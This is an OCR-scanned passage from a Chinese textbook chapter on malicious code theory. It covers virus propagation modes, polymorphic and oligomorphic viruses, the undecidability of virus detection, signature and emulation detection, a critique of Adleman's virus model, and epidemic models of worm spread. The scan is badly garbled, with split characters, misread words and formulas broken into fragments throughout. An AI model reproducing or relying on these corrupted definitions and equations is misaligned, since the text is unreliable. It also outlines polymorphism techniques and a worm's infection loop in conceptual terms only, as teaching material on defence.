编译 源 代码 的 编译 程序 之 间 必 须 相 协调 (兼容 )。 

IBM PC 的 引导 型 病毒 既 属 于 专用 计算 机 的 病毒 ,也 属于 独立 于 操作 系统 的 病毒 。 在 
DOS 系统 下 感染 可 执行 文件 和 源 文 件 的 文件 附加 型 病毒 既是 专用 计算 机 的 病毒 又 是 专用 
操作 系统 的 病毒 。 

定义 2.14 如 果 病 毒 在 传播 期 间 附 加 在 可 执行 文件 上 ,那么 称 这 种 方式 为 直接 的 传播 
方式 。 如 果 病 毒 在 传播 期 间 附加 在 不 可 执行 文件 上 ,那么 称 这 种 方式 为 间接 的 传播 方式 。 

以 直接 传播 方式 传播 的 病毒 感染 可 执行 文件 。 可 执行 文件 能 够 被 操作 系统 或 其 他 程序 
所 解释 。 例 如 ,因为 Word 能 够 解释 并 执行 宏 程 序 , 所 以 病毒 能 以 直接 传播 的 方式 感染 
Windows 包含 宏 程序 的 Microsoft Word 文件 。 

以 间接 传播 方式 进行 传播 的 病毒 感染 源 文 件 ,因为 这 些 源 文件 必须 被 编译 和 链接 ,所 以 
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病毒 就 可 以 依靠 编译 程序 和 链接 程序 ,以 不 同 的 形式 出 现在 可 执行 文件 中 。 这 样 ,病毒 就 可 
以 完全 在 主机 程序 中 构建 (Build) 。 

2. 多 态 型 病毒 和 少 态 型 病毒 

上 面 所 讨论 的 病毒 的 出 现形 式 在 所 有 感染 场合 中 都 是 一 样 的 。 然 而 ,完全 可 以 想象 病 
毒 能 够 在 感染 期 间 以 某 些 方式 改变 自己 的 形态 。 

定义 2.15 当 有 两 个 程序 区 被 同样 的 病毒 以 指定 传播 方式 感染 ,并 且 病 毒 程序 的 代码 
顺序 不 同时 ,这 种 方式 称 为 多 形态 的 传播 方式 。 

定义 2.16 当 病 毒 具 有 多 形态 传播 方式 时 ,该 病毒 便 被 称 为 多 态 型 病毒 。 

定义 2.17 当 有 两 个 程序 区 被 同样 的 病毒 以 指定 传播 方式 感染 ,并 且 病 毒 程序 的 代码 
顺序 相同 但 至 少 有 一 部 分 病毒 代码 被 使 用 不 同 的 密 钥 加 密 时 ,这 种 传播 方式 称 为 少 形态 的 


传播 方式 。 
定义 2.18 当 病 毒 具 有 少 形态 传播 方式 ,并且 没有 多 形态 传播 方式 时 ,该 病毒 便 被 称 
为 少 态 型 病毒 。 


很 显然 , 少 态 和 多 态 的 重要 区 别 是 少 态 型 病毒 的 代码 顺序 是 不 变 的 ,而 多 态 型 病毒 强调 
的 是 改变 代码 顺序 。 

当 病 毒 使 用 随机 密 钥 进行 加 密 时 , 某 个 特殊 的 复制 就 可 能 是 少 态 型 病毒 。 它 能 将 详 码 
部 分 附加 到 被 译 码 的 病毒 程序 上 。 

多 态 型 病毒 的 实现 要 比 少 态 型 病毒 的 实现 复杂 得 多 ,它们 能 改变 目 身 的 详 码 部 分 。 例 
如 ,通过 从 准备 好 的 集合 中 任意 选取 详 码 程序 。 该 方法 也 能 通过 在 传播 期 间 随 机 产生 程序 
指令 来 完成 。 例 如 ,可 以 通过 如 下 的 方法 来 实现 。 

(1) 改变 译 码 程序 的 顺序 。 

(2) 处 理 需 能 够 通过 一 个 以 上 的 指令 (序列 ) 来 执行 同样 的 操作 。 

(3) 回 译 码 程序 中 随机 地 放 和 人 哑 命 令 (Dummy Command)。 

实际 上 ,存在 着 一 些 少 态 型 病毒 和 多 态 型 病毒 的 子 类 型 。 

定义 2.19 当 病 毒 具 有 多 形态 传播 方式 , 却 很 少 使 用 多 形态 性 时 ,该 病毒 被 称 为 不 活 
跃 的 多 态 型 病毒 (Slow-Polymorphic)。 

定义 2.20 ” 当 病 毒 具 有 少 形态 传播 方式 , 却 很 少 改变 代码 程序 的 随机 密 钥 时 ,该 病毒 
被 称 为 不 活跃 的 少 态 型 病毒 (Slow-Oligomorphic)。 

3. 病毒 的 检测 问题 

随 着 计算 机 病毒 的 出 现 ,病毒 检测 的 问题 也 随 之 出 现 。 

定义 2.21 病毒 的 检测 问题 是 算法 理论 的 问题 ,也 就 是 说 ,是 否 存 在 决定 某 一 特定 程 
序 能 否 被 病毒 感染 的 特定 算法 。 

假设 对 于 可 执行 文件 而 言 ,处 理 右 的 指令 集 和 每 个 指令 的 操作 都 是 已 知 的 。 对 于 源 文 
件 而 言 ,程序 声言 的 语法 和 编译 天 的 操作 都 是 完全 已 知 的 。 

4. 病毒 检测 的 一 般 问 题 

考虑 Church 定理 (Church-Theorem) ,如 果 存 在 着 某 一 能 够 解决 病毒 检测 问题 的 算法 ， 
那么 就 能 通过 建立 图 灵机 来 执行 相应 的 算法 。 不 位 的 是 ,即使 在 最 简单 的 情况 下 ,也 不 可 能 
制造 出 这 样 的 图 灵机 。 


第 2 章 恶意 代码 模型 及 机 制 39 


定理 2.10 不 可 能 制造 出 一 个 图 灵机 ,并 利用 该 计算 机 判断 RASPM_ABS 中 的 可 执 
行文 件 是 否 含有 病毒 。 

证 明 : 根据 定理 2. 3 可 知 , 不 可 能 创造 RASPM 或 RASPM_ABS 来 模拟 TM( 因 为 模拟 
而 对 程序 的 费用 函数 进行 修改 和 理论 证 明 的 观点 无 关 )。 因 此 ,在 模拟 TM 的 RASPM_ 
ABS 中 创建 一 个 P。 当 待 模拟 的 TM 在 一 个 可 接受 的 状态 停机 时 ,该 程序 就 在 输出 带 上 记 
上 数字 “1”。 

现在 来 制造 一 个 能 够 感染 程序 的 病毒 。 首 先 ,使 上 面 所 提 到 的 程序 P 包含 病毒 ,这 样 
对 于 任意 的 固定 输入 B 而 言 ,P 一 开始 就 作为 一 个 回答 而 被 执行 ,然后 病毒 也 开始 运行 了 。 
可 以 通过 将 病毒 附加 到 了 上 ,并 在 P 的 每 个 write character 1 指令 后 插入 一 个 JUMP 指令 
来 实现 。 所 以 控制 便 被 传 给 病毒 程序 的 第 一 个 指令 。 在 感染 的 事件 中 ,病毒 程序 不 但 能 复 
制 病 毒 程序 而 且 能 复制 程序 P 以 及 固定 输入 B。 

根据 此 程序 ,对 于 任意 的 TM, 都 可 能 在 RASPM_ABS 中 创造 一 个 程序 V ,如 果 V 真正 
能 被 传播 ,那么 它 就 成 为 病毒 。 很 明显 ,如果 程序 P 和 TM 因为 固定 的 输入 而 停止 运行 , 那 
么 程序 V 就 能 进行 传播 。 

假设 相反 的 情况 : 存在 着 图 录 机 T, 本 能 读 RASPM_ABS 的 任何 程序 ,并 且 程 序 含 有 
病毒 时 输出 数字 “1”, 没 有 病毒 时 输出 数字 “0”。 如 果 TM 用 “1” 来 回答 输入 程序 V ,那么 程 
序 P 或 相应 的 TM 无 论 如 何 都 将 停止 接受 输入 B。 如 果 回 答 是 “0”, 相 应 的 TM 将 不 会 停 
止 。 因 此 ,作为 对 一 个 输入 的 回答 ,TM 是 能 够 决定 另 一 个 TM 是 否 会 停止 的 。 然 而 ,这 是 
不 可 能 的 。 

结论 为 : 根据 Church 定理 ,不 可 能 建立 用 来 检测 病毒 的 算法 。 

现在 ,认为 定义 2.21 所 定义 的 病毒 检测 问题 是 不 能 解决 的 。 所 以 应 该 限制 该 问题 。 

5. 病毒 检测 方法 

如 果 只 涉及 一 些 已 知 病毒 的 问题 ,那么 就 可 能 简化 病毒 检测 问题 。 在 此 情况 下 ,可 以 将 
已 知 病毒 用 在 检测 算法 上 。 

从 每 个 已 知 病毒 中 提取 一 系列 代码 , 当 病 毒 进 行 传播 时 ,它们 就 会 在 每 个 被 感染 了 的 文 
件 中 显示 出 来 ,将 这 一 系列 代码 称 为 序列 。 病 毒 检 测 程序 的 任务 就 是 在 程序 中 搜寻 这 些 订 
列 。 然 而 ,关于 这 些 原理 的 算法 ,出 现 了 进一步 的 问题 。 

(1) 不 能 确定 多 态 型 病毒 是 否 含 有 某 些 序列 ,通过 这 些 序列 可 以 检测 病毒 的 所 有 变异 。 

(2) 当 发 现 序 列 是 随机 的 时 ,不 知道 发 生 错 误 报 警 的 概率 。 

(3) 该 采用 什么 样 的 费用 标准 来 衡量 序列 搜寻 算法 的 实现 。 

很 明显 ,该 方法 不 能 用 来 检测 多 态 型 病毒 (必须 寻找 其 他 解决 途径 ) ,但 此 方法 却 可 以 用 
来 检测 少 态 型 病毒 。 在 这 样 的 情况 下 ,必须 使 用 病毒 解码 函数 的 代码 来 产生 搜寻 序列 。 

6. 病毒 检测 错误 报警 估算 


发 生 错 误 报 警 的 数量 与 序列 (特征 代码 ) 的 长 度 有 关 , 又 与 发 现 程 序 中 指定 单元 的 值 定 
制 的 可 能 性 有 关 。 如 果 用 N 表示 一 个 序列 的 平均 长 度 , 且 每 个 字符 能 以 相同 的 概率 (也 就 
是 字符 集 大 小 的 倒数 ) 出 现 , 并 用 M 表示 序列 的 总 个 数 , 用 开 ( 工 广 N) 表 示 被 检测 文件 的 
总 长 度 ,那么 在 一 个 文件 中 发 现任 意 序 列 的 概率 为 

PL.。M. 二 


n 
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检查 现在 的 费用 标准 ,通过 该 标准 可 以 实现 序列 的 搜寻 算法 。 因 为 人 们 通常 使 用 的 计 
算 机 的 存储 器 的 尺寸 及 其 单元 的 长 度 都 是 固定 的 (RASPM_ABS 的 情况 不 是 这 样 的 ) ,所 以 
每 个 指令 的 费用 都 小 于 一 个 常数 。 因 此 建议 使 用 统一 的 费用 来 计算 。 序 列 搜寻 算法 将 序列 
的 第 一 个 单元 的 内 容 和 每 个 待 检测 单元 的 内 容 进 行 比较 。 如 果 检 测 是 分 开 进 行 的 ,那么 必 
须 进行 L。M 次 比较 。 但 是 ,序列 是 可 以 根据 它们 第 一 个 单元 的 内 容 进 行 排序 的 。 我 们 利 
用 中 间 位 置 的 特征 开始 检测 ,然后 跟随 程序 回 右 移动 。 倘 奋 所 有 序列 的 第 一 个 单元 的 内 容 
均 不 相同 ,那么 使 用 该 方法 就 只 要 进行 L，|logM | 次 比较 (| xz | 表示 不 小 于 的 整数 ) 。 如 
果 发 现 所 有 序列 的 第 一 个 单元 的 内 容 有 相同 的 ,那么 也 必须 检测 第 二 个 单元 的 内 容 。 所 要 


求 的 进一步 检测 的 预期 值 是 过。M 。 一 。 如 果 在 第 天 个 检测 中 也 出 现 相同 情况 ,那么 要 求 


进一步 的 L。M。 去 次 的 检测 。 所 以 ,所 有 要 求 检 测 的 预期 值 为 
] 
到 -EM 一 
”7-1 
考虑 到 可 能 出 现 的 最 坏 情况 ,进行 比较 的 最 大 次 数 为 S= 工 。M . N。 由 于 可 以 通过 比 
较 的 次 数 来 估计 算法 的 时 间 需 求 ,因此 序列 搜寻 算法 可 以 在 多 项 式 时 间 级 别 实现 。 
为 了 识别 多 态 型 病毒 模型 ,我 们 使 用 模拟 的 方法 。 该 方法 的 实质 就 是 在 处 理 器 进行 仿 
真 (模拟 ) 时 开始 执行 被 检测 的 程序 。 关 于 被 执行 的 指令 ,我 们 准备 了 一 份 统计 表 , 该 统计 表 
会 不 断 地 被 用 来 和 已 知 多 态 型 病毒 的 现 有 统计 表 进 行 比 较 。 当 发 现 一 致 时 ,病毒 就 被 检测 
出 来 了 。 根 据 此 方法 ,在 译 码 后 ,可 疑 程序 的 操作 代码 就 能 被 检查 出 来 。 与 序列 搜寻 过 程 相 
比 ,序列 代码 中 没有 用 来 和 已 知 代码 比较 的 一 部 分 ,但 是 它 检查 与 序列 代码 的 部 分 操作 代码 
相关 的 统计 表 。 通 过 这 样 的 方法 ,即使 部 分 指令 改变 了 ,病毒 也 能 被 辨别 出 来 。 然 而 ,为 了 
实现 搜寻 安全 和 序列 搜寻 方法 的 可 比较 性 ,统计 表 必须 基于 更 多 的 序列 代码 。 
但 是 ,仿真 类 型 搜寻 方法 不 能 在 多 项 式 时 间 级 别 实现 ,因为 病毒 能 够 在 译 码 程序 中 存 
在 ,这 些 译 码 程序 是 以 一 个 依赖 于 随机 数 的 指数 时 间 级 别 被 执行 的 。 搜 寻 未 知 病毒 的 一 个 
可 能 方法 就 是 多 态 型 病毒 中 所 提 及 的 处 理 器 仿真 方法 。 然 而 ,在 此 情况 下 ,没有 预先 的 统计 
表 , 但 可 监视 病毒 的 典型 行为 。 例 如 ,在 某 一 程序 中 ,病毒 的 这 些 典型 行为 有 修改 其 他 程序 ; 
试图 修改 其 他 程序 ; 试图 修改 操作 系统 。 


So= LM Mn 
nn n 


2.3 ”基于 化 归 耳 数 的 计算 机 病毒 的 数学 模型 


近 几 十 年 来 ,计算 机 病毒 检测 已 经 成 为 一 个 普 这 问题 。 非 第 明显 ,有 很 大 一 部 分 病毒 具 
有 展 性 的 或 中 度 破坏 力 。 然 而 ,病毒 是 否 对 计算 环境 具有 重大 浴 在 破坏 仍 是 一 个 公开 课题 。 
如 何 从 各 个 方面 对 计算 机 病毒 进行 全 面 的 描述 ,得 到 完善 的 病毒 计算 机 模型 是 一 个 有 符 研 
究 的 问题 。 目 前 ,在 计算 机 病毒 研究 中 有 将 病毒 内 洱 扩 大 化 的 倾 问 ,将 任何 具有 破坏 作用 的 
程序 称 为 病毒 。 笔 者 认为 这 掩盖 了 病毒 传染 这 一 本 质 ,不 利于 对 病毒 的 深 人 研究 。 
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2.3.1 Adlemen 病毒 模型 


Adlemen 给 出 的 计算 机 病毒 形式 定义 如 下 。 
。 S 表示 所 有 自然 数 有 穷 序 列 的 集合 。 
e 表示 一 个 从 SXS 到 六 的 可 计算 的 入射 函数 , 它 具 有 可 计算 的 道 函 数 。 
对 所 有 的 s,1 ES, 用 < ;s,t > 表示 e(s,1)。 
对 所 有 部 分 函数 f: N 一 N 及 所 有 ,itES, 用 f(s,t) 表 示 f(<s,t>)。 
e 表示 一 个 从 N XN 到 NN 的 可 计算 的 入射 函数 , 它 具 有 可 计算 的 逆 了 浮 数 ,并 且 对 所 
有 i,jEN,e (i,j) 之 i。 
对 所 有 i,jEN,<i,j > 表示 e'(i,j)。 
对 所 有 部 分 函数 f: N 一 N 及 所 有 i,jEN,f(i,j) 表 示 f(<i,j >)。 
对 所 有 部 分 函数 f: N 一 N 及 所 有 nEN,f(n) y 表示 f(n) 是 有 定义 的 。 
对 所 有 部 分 图 数 f: N 一 N 及 所 有 ?EN,F(Oz) 个 表示 fl(n) 是 未 定义 的 。 

定义 2.22 对 所 有 部 分 图 数 f,g: NN 及 所 有 ,tiES,Fs,i) 一 g5(s,i) 当 且 仅 当 
flsst) Gg(sst) yy 或 FiygGt)y Fi) 一 5(st)。 

定义 2.23 对 所 有 >,z EN,p,p ,dgq=qiq…dq:,dq 二 9192…9g:ES, 任 一 个 部 分 函数 
h:N>N,<p,g>~<p',q'> 当 且 仅 当 z=z' 并 且 p= 二 p' 并 且 存 在 i,1<i<<z, 满 足 g; 关 gq!, 并 
上 是 对 i==1,2,…,z, 以 下 任 一 条 成 立 : 

(1) gq;=gi。 

(2) h(g;) vy 并 且 qi) 一 qi。 

定义 2.24 对 所 有 部 分 函数 f,g,h: N 一 N 及 所 有 ,ziES,FGs,i) 一 sg(Gs,i) 当 且 仅 当 
flsst) Yels,t)y eR i 

定义 2.25 对 所 有 部 分 函数 f,g,h: N 一 N 及 所 有 s,1ES, f(s,1) 一 g(s,t) 当 且 仅 当 
f(s,t) 二 g(s,1) 或 Pe 

定义 2.26 对 所 有 部 分 递归 浮 数 的 歌德 尔 配 数 {@;}) ,一 个 完全 递归 图 数 w 对 {@,) 来 说 
是 一 个 病毒 , 当 且 仅 当 对 所 有 d,pES, 下 列 条 件 之 一 成 立 。 

(1) 破坏 (Vi EN)LGo (Cd ,bp) 王 Go (dzp)]。 


(2) 传染 或 模仿 (V jE N)[@,(d,p) 守 $0 (d,p)]。 
以 上 用 符号 d、p 的 目的 是 想 将 可 访问 的 信息 区 分 成 数据 (不 会 被 传染 的 信息 ) 和 程序 
(容易 被 传染 )。 


2.3.2 Adlemen 病毒 模型 的 分 析 


在 这 里 采用 Fred Cohen 有 关 计 算 机 病毒 的 定义 :“ 病 毒 是 一 种 计算 机 程序 , 它 通 过 修 
改 其 他 程序 ,使 其 包含 病毒 程序 日 映 或 某 种 变异 ,来 传染 其 他 程序 。" 正 是 由 于 病毒 的 这 种 传 
染 特 性 , 它 才 得 以 传播 。 被 传染 的 程序 包含 了 病毒 , 它 又 传染 其 他 程序 ,使 得 病毒 不 断 传播 。 

传染 是 病毒 的 本 质 。 只 有 当 一 个 程序 具有 传染 特性 时 , 才 认为 它 是 病毒 ,而 不 管 程序 是 
否 具 有 破坏 性 。 按 这 种 观念 ,Adlemen 病毒 模型 有 如 下 缺陷 。 
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(1) 计算 机 病毒 的 面 太 广 。 按 照 Adlemen 病毒 模型 的 定义 ,很 多 不 是 病毒 的 程序 也 被 

认为 是 病毒 。 首 先 考 虑 一 个 程序 v: N 一 N。 
VzEN vxX)=d,dE€EN 

这 里 过 可 以 是 一 个 程序 或 数据 。 这 个 程序 破坏 其 他 程序 ,但 是 它 不 具备 传染 特性 ,所 
以 它 不 是 病毒 。 然 而 ,按照 Adlemen 病毒 模型 的 定义 , 它 显然 是 一 个 病毒 ,因为 它 满足 “ 破 
坏 ” 的 定义 

(Vi € NILGo (d,p) = Bo (d,p)] 
这 里 v(i) 二 v(j) 二 d。 男 外 一 个 程序 例子 即 所 谓 的 “ 恒 等 函 数 ”w: N 一 N 
YXEN vz)=zx 

这 种 不 做 任何 操作 的 程序 v 也 同样 被 不 恰当 地 当成 了 病毒 ,因为 它 满足 “传染 或 模仿 ” 

的 定义 


(Vj € N[G,(d,p) > Bu (d,p)] 
这 里 v(j) 二 ;。。 实 际 上 ,所 使 用 的 大 部 分 程 订 f: N 一 NN 并 不 修改 其 他 程序 , 即 如 果 p 
是 一 个 程序 的 编码 , 则 f(p) 二 pp。 不 六 的 是 ,这 种 程序 按照 Adlemen 病毒 模型 的 定义 也 成 
了 了 病毒。 显然, 按照 这 种 定义 ,大 部 分 程序 将 被 当成 病毒 。 其 主要 问题 在 于 Adlemen 将 “ 模 
仿 ” 作 为 病毒 的 特征 之 一 因而 过 分 扩大 了 病毒 的 范围 。 
(2) 定义 并 没有 反映 出 病毒 的 传 当 特性。 根据 定义 ”传染 或 模仿 ?是 指 


(Vi € N)[G(d,p) Bd,p)] 
而 这 个 定义 并 不 能 蕴含 v(j) 包 含 v 或 其 变异 。 
(3) 定义 不 能 体现 出 病毒 传染 的 传递 特性 。 被 传染 的 程序 应 该 成 为 病毒 的 载体 , 它 将 
病毒 传染 给 其 他 程序 。 然 而 ,无 法 从 Adlemen 病毒 模型 推出 这 条 性 质 。 
(4)“ 破 坏 ” 的 定义 不 合适 。 根 据 定义 ,如 果 wv 是 一 个 恶意 病毒 , 则 所 有 被 v 传染 的 程序 
其 功能 是 一 样 的 。 实 际 上 ,很 多 病毒 在 进行 恶意 操作 的 同时 还 保留 了 源 程 序 的 功能 。 被 感 
染 程序 的 功能 取决 于 病毒 的 功能 和 源 程 序 的 功能 。 


2.4 Internet 蠕虫 传播 模型 


上 面 已 经 介绍 了 传统 计算 机 病毒 的 两 种 理论 模型 。 考 虑 到 传统 计算 机 病毒 已 经 不 是 亚 
意 代码 的 主流 ,本 文 将 介绍 近 阶 段 的 恶意 代码 典型 代表 一 一 Internet 蠕虫 的 传播 模型 。 

在 对 传统 计算 机 病毒 的 传播 机 制 研究 中 ,常常 便 用 已 有 的 传染 病 数 学 模型 ,但 由 于 计算 
机 病毒 的 攻击 对 象 是 文件 系统 ,因此 传统 计算 机 病毒 研究 中 把 计算 机 作为 传播 个 体 并 不 合 
适 。 另 外 ,传统 计算 机 病毒 一 般 情 况 下 是 被 动 传播 ,要 有 计算 机 使 用 者 的 参与 ,而 传染 病 模 
型 中 ,只 有 感染 主体 与 被 感染 客体 ,借用 传染 病 模型 ,就 要 忽略 计算 机 使 用 者 ,而 计算 机 使 用 
者 在 传统 计算 机 病毒 传播 过 程 中 是 相当 重要 的 一 环 。 与 传统 计算 机 病毒 不 同 的 是 ,Internet 
蠕虫 具有 主动 攻击 特征 ,不 需要 计算 机 使 用 者 的 参与 ,并 且 蠕 虫 的 攻击 对 象 是 计算 机 系统 ， 
这 两 个 条 件 正好 同 传染 病 模型 的 假设 条 件 相符 。 

另外 ,已 有 的 讨论 传染 病 数 学 模型 局 限 在 固定 总 量 的 传播 群体 ,而 且 只 讨论 传播 的 初始 
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阶段 和 最 后 的 稳定 状态 的 特性 ,没有 考虑 快速 传播 阶段 的 特性 。 在 蠕虫 传播 的 讨论 中 ,认为 
网 络 的 拓扑 结构 对 蠕虫 的 传播 具有 决定 性 的 影响 ,目前 比较 好 的 结果 都 是 基于 随机 同 构 网 
络 得 到 的 。 而 在 Internet 中 应 用 程序 间 进 行 通信 时 由 于 TCP/IP 协议 屏 珊 了 网 络 的 拓扑 结 
构 , 因 此 从 应 用 层 程序 的 角度 看 ,可 以 认为 Internet 是 一 个 完全 链接 网 络 。 

本 节 以 更 符合 传染 病 模型 的 Internet 蠕虫 为 研究 对 象 ,介绍 基于 SI (Susceptible- 
Infected) SIS (Susceptible-Infected-Susceptible) 和 SIR (Susceptible-Infected-Removed ) 
3 种 不 同 传染 病 模 型 快速 传播 阶段 的 网 络 特 性 。 关 于 Internet 晴 虫 传播 模型 的 更 次 层次 的 
介绍 请 参考 南开 大 学 郑 辉 博士 的 学 位 论文 4Internet 蠕虫 研究 》。 


2.4.1 SIS 模型 和 SI 模型 


假设 在 一 定 环境 中 , 当 某 种 群 中 不 存在 流行 病 时 ,其 种 群 CN) 的 生长 服从 微分 系统 
N 一 pewN 一 dN Coe 
其 中 ,N= 二 NN(?) ,表示 t 时刻 该 环境 中 总 种 群 的 个 体 数量 ; be ”表示 种 群 中 单位 个 体 的 生育 
率 ; d 表示 单位 个 体 的 自然 死亡 率 ,%>d>>0,a>0。 当 流行 病 存 在 于 该 种 群 中 时 ,疾病 的 传 
染 机 制 如 图 2-5 所 示 。 


be™"N BSI -7 


S A 
| | 


(Gd+a)7 
2-5 疾病 的 传染 机 制 


这 里 ,S、I 分 别 表示 易 感 者 类 和 染病 者 类 ,其 中 所 有 的 参数 均 为 正常 数 。 且 be “N 表 
示 外 界 对 环境 的 输入 ; 8 表示 一 个 染病 者 所 具有 的 最 大 传染 力 ; ~(r 字 0) 表示 疾病 的 恢复 
力 ; d,a(a 二 0) 表 示 目 然 死 亡 率 和 额外 死亡 率 。 

所 以 ,流行 病 的 传播 服从 双 线 形 传 染 率 8ST(C8>0) 的 SIS 模型 , 即 


S =be“N—BSI—dS+rl 
(2-2) 
I = BSI— (da+n)1 


这 时 总 种 群 的 生长 服从 系统 。 
N 一 peN 一 dN 一 of (2-3) 
其 中 ,S= 二 SG) 和 I= 二 1(z) 分 别 表示 1t 时 刻 易 感 类 (S) 和 染病 类 (7) 中 个 体 的 数量 ,N (7) = 
a 
在 SIS 模型 中 , 当 r=0 时 ,该 模型 变 为 SI 模型 。 


2.4.2 SIR 模型 


众所周知 ,如 果 在 计算 机 系统 中 有 已 感染 恶意 代码 的 可 执行 程序 传 入 ,只 要 其 中 被 恶意 
代码 感染 (带菌 者 ) 的 可 执行 文件 运行 (运行 就 是 接触 ,接触 就 可 能 传播 恶意 代码 ) ,就 会 造成 
恶意 代码 在 系统 中 的 传播 。 现 作 如 下 两 个 假设 。 

(1) 已 被 恶意 代码 感染 的 文件 ( 档 ) 具 有 免疫 力 。 

(2) 亚 意 代码 的 潜伏 期 很 短 ,近似 地 认为 等 于 零 。 
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这 样 就 可 以 把 系统 中 的 可 执行 程序 分 为 3 种 。 

(1) 被 传播 对 象 , 即 尚未 感染 恶意 代码 的 可 执行 程序 ,用 SC) 表示 其 数目 。 

(2) 带菌 者 , 即 已 感染 恶意 代码 的 可 执行 程序 ,用 po(i) 表 示 其 数目 。 

(3) 被 感染 后 具有 免疫 力 的 可 执行 程序 ,也 包括 被 传播 后 在 一 定时 间 内 不 会 运行 的 可 
执行 程序 (相当 于 患 病 者 死去 ) ,用 尺 (i) 表 示 其 数目 。 


它们 满足 如 下 条 件 。 
dS 一 
(2-4) 
dR _ 
Po HP 


其 中 ,4 表示 传播 (感染 ) 速 度 ; 表示 每 个 时 间 段 接触 次 数 ; y 表示 第 二 种 程序 变 成 第 三 种 
程序 的 速度 。 

对 式 (2-4) 进 行 如 下 解释 。 

(1) SG 的 变化 率 , 即 经 第 一 种 程序 变 成 第 二 种 程序 的 变化 率 , 它 与 传染 者 和 被 传染 者 
之 间 的 接触 次 数 有 关 ,并 且 正 比 于 这 两 类 文件 的 乘积 。 

(2) R(7) 的 变化 率 , 即 第 二 种 程序 变 成 第 三 种 程序 的 变化 率 , 与 当时 第 二 种 的 可 执行 程 
序数 目 成 正比 。 

(3) 在 考虑 的 时 间 间 隔 内 ,系统 内 可 执行 程序 的 总 数 变 化 不 大 ,并 且 假 设 它 恒 等 于 常数 
( 既 没 有 文件 被 撤销 ,也 没有 外 面 的 新 文件 进来 ) ,从 而 可 执行 程序 总 数 的 变化 率 为 零 。 因 
此 有 


Si 十 pb 十 下 (1 一 从 (2-5) 
即 
dd__dS_dk _ 
dt dt dt (0 
将 式 (2-4) 和 式 (2-5) 联 合 得 

全 
和 一 一 pp 十 ApS (2-7) 
dR _ 
de HP 


该 模型 的 最 重要 的 特征 就 是 存在 着 一 个 非 零 的 国 值 M.。 如 果 A>). ,那么 有 限 数目 的 文 
件 会 感染 恶意 代码 ; 如 果 4 二 14. ,那么 被 感染 的 总 文件 数 R。。 一 limR(z) 便 为 一 个 很 小 的 什 
(相对 于 具有 很 多 个 文件 的 庞大 系统 而 言 )。 为 了 更 好 地 理解 这 些 概念 ,现在 考虑 式 (2-4)， 
不 失 一 般 性 , 令 y= 二 1, 并 给 出 初始 条 件 R(0)==0 和 S(0) 二 1( 即 假设 一 开始 被 感染 的 文件 数 
极 少 ,也 就 是 说 p(0) 二 0) ,那么 ,就 得 到 

S(1) = eK RG) (2-8) 
结合 式 (2-5) ,发 现 被 恶意 代码 感染 的 总 文件 R., 满 足下 面 的 自 相 关 的 等 式 。 
R= 1 一 extR- (2-9) 
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R= 二 0 则 是 使 式 (2-9) 恒 成 立 的 解 。 为 了 得 到 非 零 解 ,必须 满足 如 下 条 件 。 
dd 
dR= 

该 条 件 和 限制 条 件 二 )。 意义 相同 ,在 此 特殊 情况 下 , 设 1.=&-:。 在 =). 处 进行 泰勒 

展开 ,就 可 以 得 到 恶意 代码 的 感染 行为 R, 一 (4 一 4.)( 比 流行 病 国 值 有 效 )。 在 非 平 衡 状 态 
转换 的 物理 语言 中 ,流行 病 国 值 完全 等 同 于 临界 融 点 的 值 。 在 对 类 似 现象 进行 推理 时 ,可 以 
将 R,。 和 4】 分别 看 成 状态 转换 的 顺序 参数 及 调整 参数 。 


2.4.3 网络 模 型 中 蠕虫 传播 的 方式 


1. 蠕虫 的 工作 方式 

通过 对 已 经 出 现 过 的 Internet 蠕虫 进行 分 析 , 可 以 把 蠕虫 的 工作 方式 归纳 如 下 。 

(1) 随机 产生 一 个 IP 地 址 。 

(2) 判断 对 应 此 IP 地 址 的 计算 机 是 否 可 被 感染 。 

(3) 如 果 可 被 感染 , 则 感染 之 。 

(4) 重复 (1) 一 (3) 步 zu 次 ,ma 为 蠕虫 产生 的 繁殖 副本 数量 。 

2. 完全 链接 网 络 模 型 

完全 链接 网 络 指 的 是 网 络 中 所 有 的 节点 之 间 都 有 直接 链接 。 在 完全 链接 网 络 中 ,网 络 
节点 数 的 增 减 对 网 络 性 质 没 有 影响 。 蠕 虫 的 传播 基础 是 Internet, 由 于 Internet 中 计算 机 
依靠 IP 地 址 来 相互 识别 ,在 通信 时 只 考虑 是 否 可 达 , 而 不 考虑 信息 传送 的 具体 途径 , 即 与 网 
络 的 实际 拓扑 结构 无 关 , 因 此 相对 于 应 用 层 的 程序 来 讲 ,Internet 可 以 看 成 是 一 个 以 IP 地 
址 为 节点 的 完全 链接 网 络 。Nicholas Weaver 研究 蠕虫 传播 速度 时 ,也 把 Internet 看 成 一 个 
完全 链接 网 络 来 处 理 , 但 没有 深入 讨论 传播 模型 本 身 固 有 的 性 质 。 

由 于 整个 Internet 中 存在 空 IP 地 址 (尚未 分 配 或 没有 设置 在 具体 的 计算 机 上 ) ,另外 ， 
对 蠕虫 传播 来 讲 , 很 多 IP 地 址 对 应 的 计算 机 对 某 种 蠕虫 是 免疫 的 (操作 系统 不 同 、 无 漏洞 
等 ) ,因此 考虑 将 这 些 蠕虫 不 能 感染 的 IP 地 址 对 应 的 节点 从 网 络 中 除去 ,对 于 只 由 易 被 感染 
的 计算 机 构成 的 完全 链接 网 络 ,考虑 蠕虫 在 这 个 网 络 中 传播 , 当 晴 虫 从 网 络 中 的 一 个 节点 加 
外 传播 时 ,采用 如 下 传播 规则 。 

(1) 随机 选 出 和 2 个 节点 进行 感染 ,每 个 节点 被 感染 的 概率 为 p。 

(2) 被 蠕虫 感染 的 所 有 节点 重复 此 过 程 , 直 到 感染 网 络 中 的 全 部 节点 。 

其 中 ,poeN( 代 表 “ 与 …… 成 正比 ”) ,在 仿真 中 , 设 p= 二 FN(p 三 1), 这 里 下 为 概率 因 
子 , 通 过 调整 下 的 大 小 ,可 以 调整 仿真 程序 中 蠕虫 传播 的 速度 ,对 于 实际 的 Internet, 有 下 = 
1/2”, 即 感染 概率 为 p= 二 N/2”。 


(1 一 eR-) | Rs。 =0>1 (2-10) 


2.5 恶意 代码 预防 理论 模型 


目 20 世纪 90 年 代 以 来 ,国内 外 有 关 学 者 提出 了 许多 防范 计算 机 病毒 和 恶意 代码 的 理 
论 模 型 。 本 节 就 Fred Cohen 及 K.Jones 等 人 提出 的 有 关 模 型 作 简 要 介绍 。 
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1. F. Cohen 提出 的 “四 模型 ”理论 

(1) 基本 隔离 模型 。 该 模型 的 主要 思想 是 取消 信息 共享 ,将 系统 隔离 开 来 ,使 得 恶意 代 
